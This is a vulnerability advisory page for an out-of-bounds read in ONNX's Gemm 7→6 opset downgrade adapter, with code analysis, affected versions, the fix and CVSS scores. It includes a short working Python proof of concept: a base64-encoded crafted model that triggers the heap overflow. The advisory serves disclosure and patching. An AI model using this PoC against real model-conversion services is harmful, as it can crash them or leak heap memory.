Mend.io Vulnerability Database
The largest open source vulnerability database
What is a Vulnerability ID?
New vulnerability? Tell us about it!
CVE-2026-63632
Published:July 24, 2026
Updated:August 04, 2026
Summary Heap-buffer-overflow READ (16 bytes) in "Gemm_7_6::adapt_gemm_7_6()" ("onnx/version_converter/adapters/gemm_7_6.h:41") when "ConvertVersion()" processes a model with a Gemm node whose input tensors have fewer than 2 dimensions. The adapter accesses "B_shape[1]" without checking rank. On Release builds the OOB read is silent; ASan confirms 16-byte read past a 48-byte allocation. Details The Gemm 7→6 downgrade adapter reads input shapes without bounds checking: // gemm_7_6.h:26-42 const auto& A_shape = inputs[0]->sizes(); // May have < 2 elements const auto& B_shape = inputs[1]->sizes(); // May have < 2 elements if (node->hasAttribute(ktransB) && node->i(ktransB) == 1) { MN.emplace_back(B_shape[0]); // OOB if B has 0 dims } else { MN.emplace_back(B_shape[1]); // OOB if B has < 2 dims ← CRASH } The PoC has input B with shape "[28]" (1 dimension). "B_shape" has 1 element. Accessing "B_shape[1]" reads 16 bytes past the "std::vector<Dimension>" internal storage into adjacent heap memory. The same unchecked pattern applies to "A_shape[0]" and "A_shape[1]" at lines 34 and 36. Entry point: "onnx.version_converter.convert_version(model, 6)" — different from the "InferShapes" bugs reported in separate advisories. This triggers during opset downgrade (7→6). PoC import base64 import onnx from onnx import version_converter poc_b64 = "CAM6rwEKUQoBQQoBQgoBQRIBWSIER2VtbSoPCgVhbHBoYRUBAQA+oAEBKg4KBGJldGEVAAAAOqABASoNCgZ0dGZsc0EYAaABAioNCgZ0cmFuc0IYAKABAhIKb2Vpdl94bWZ2aFoTCgFBEg4KDAgBEggKAggCCgIIA1oTCgFCEg4KDAgBEggKAggcCgIIBFoPCgFCEgoKCAgBEgQKAggbYhMKAVkSDgoMCAESCAoCCAIKAggEQgQKABAH" model = onnx.load_from_string(base64.b64decode(poc_b64)) Triggers heap-buffer-overflow in Gemm_7_6 adapter version_converter.convert_version(model, 6) 186-byte PoC. ASan confirms: "heap-buffer-overflow READ of size 16" at "gemm_7_6.h:41", "0 bytes after 48-byte region" allocated in "tensorShapeProtoToDimensions" at "ir_pb_converter.cc:216". Impact Any application that uses "onnx.version_converter.convert_version()" on untrusted models is vulnerable. This includes model conversion pipelines and tools that auto-downgrade opset versions for compatibility. On Release builds the OOB read is silent — the read value propagates into the converted model's output shape, potentially leaking heap data. On ASan builds it's detected as a heap-buffer-overflow. Could also cause crashes with different heap layouts.
Affected Packages
onnx (CONDA):
Affected version(s) >=1.3.0 <1.22.0
Fix Suggestion:
Update to version 1.22.0
https://github.com/onnx/onnx.git (GITHUB):
Affected version(s) >=v1.3.0 <v1.22.0
Fix Suggestion:
Update to version v1.22.0
onnx (PYTHON):
Affected version(s) >=1.3.0 <1.22.0
Fix Suggestion:
Update to version 1.22.0
Do you need more information?
Contact Us
CVSS v4
Base Score:
4.8
Attack Vector
LOCAL
Attack Complexity
LOW
Attack Requirements
NONE
Privileges Required
NONE
User Interaction
PASSIVE
Vulnerable System Confidentiality
NONE
Vulnerable System Integrity
NONE
Vulnerable System Availability
LOW
Subsequent System Confidentiality
NONE
Subsequent System Integrity
NONE
Subsequent System Availability
NONE
CVSS v3
Base Score:
3.3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality
NONE
Integrity
NONE
Availability
LOW
Weakness Type (CWE)
Out-of-bounds Read